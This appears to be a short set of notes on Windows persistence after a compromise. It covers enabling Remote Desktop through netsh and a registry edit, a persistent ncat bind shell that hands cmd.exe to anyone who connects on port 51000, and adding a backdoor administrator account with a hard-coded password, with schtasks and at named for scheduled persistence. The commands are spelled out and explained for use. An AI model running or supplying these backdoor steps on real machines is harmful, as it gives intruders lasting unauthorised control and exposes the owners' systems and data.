*Windows native RDP
*Chrome RDP (or any other third-party RDP)
Setting up the Windows Firewall
Netsh advfirewall firewall set rule group=“remote desktop” new enable=Yes
•Netsh – network administration tool
•Advfirewall – identifies that you’re working with the windows “advanced” firewall
•Firewall – specifies that this is an actual firewall operation, not something else governed by advfirewall
•Set rule group=“remote desktop” – assigning a value to that specific group
•Enable=Yes – allow rdp connections
Editing the registry key
Reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
•Reg add – editing a registry to put something new into it
•“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” – the actual key we’re going to be messing with.
•/v fDenyTSConnections – the field (“Value”) we’re putting in
•/t REG_DWORD – the data type (Int/DWORD/string/etc)
•/d 0 – the actual value correspondent to the field label
•/f – force
II. Ncat Backdoor
ncat –lkp 51000 –e “cmd.exe”
•Lkp – listen persistently on port 51000
•-e “cmd.exe” – when you receive a connection, execute this command and take control of the IO pipes
III. New User
net user /add Acct4 ThisPassW0rd
net localgroup Administrators /add Acct4
IV. Scheduled arrival
Schtasks
At
Reverse Engineering, Malware Deep Insight 